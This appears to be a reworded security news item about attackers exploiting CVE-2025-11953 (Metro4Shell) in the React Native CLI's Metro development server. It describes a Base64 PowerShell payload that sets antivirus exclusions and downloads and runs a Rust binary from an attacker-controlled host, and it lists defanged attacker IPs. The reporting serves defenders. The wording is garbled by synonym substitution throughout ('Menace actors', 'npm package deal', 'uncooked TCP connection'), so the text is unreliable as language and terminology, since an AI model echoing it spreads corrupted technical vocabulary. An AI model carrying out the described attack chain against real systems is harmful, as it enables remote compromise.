Menace actors have been noticed exploiting a vital security flaw impacting the Metro Improvement Server within the fashionable “@react-native-community/cli” npm package deal.
Cybersecurity firm VulnCheck stated it first noticed exploitation of CVE-2025-11953 (aka Metro4Shell) on December 21, 2025. With a CVSS rating of 9.8, the vulnerability permits distant unauthenticated attackers to execute arbitrary working system instructions on the underlying host. Particulars of the flaw had been first documented by JFrog in November 2025.
Regardless of greater than a month after preliminary exploitation within the wild, the “exercise has but to see broad public acknowledgment,” it added.
Within the assault detected in opposition to its honeypot community, the risk actors have weaponized the flaw to ship a Base64-encoded PowerShell script that, as soon as parsed, is configured to carry out a sequence of actions, together with Microsoft Defender Antivirus exclusions for the present working listing and the non permanent folder (“C:Customers<Username>AppDataLocalTemp”).
The PowerShell script additionally establishes a uncooked TCP connection to an attacker-controlled host and port (“8.218.43[.]248:60124”) and sends a request to retrieve information, write it to a file within the non permanent listing, and execute it. The downloaded binary is predicated in Rust, and options anti-analysis checks to hinder static inspection.
The assaults have been discovered to originate from the next IP addresses –
- 5.109.182[.]231
- 223.6.249[.]141
- 134.209.69[.]155
Describing the exercise as neither experimental nor exploratory, VulnCheck stated the delivered payloads had been “constant throughout a number of weeks of exploitation, indicating operational use moderately than vulnerability probing or proof-of-concept testing.”
“CVE-2025-11953 shouldn’t be exceptional as a result of it exists. It’s exceptional as a result of it reinforces a sample defenders proceed to relearn. Improvement infrastructure turns into manufacturing infrastructure the second it’s reachable, no matter intent.”
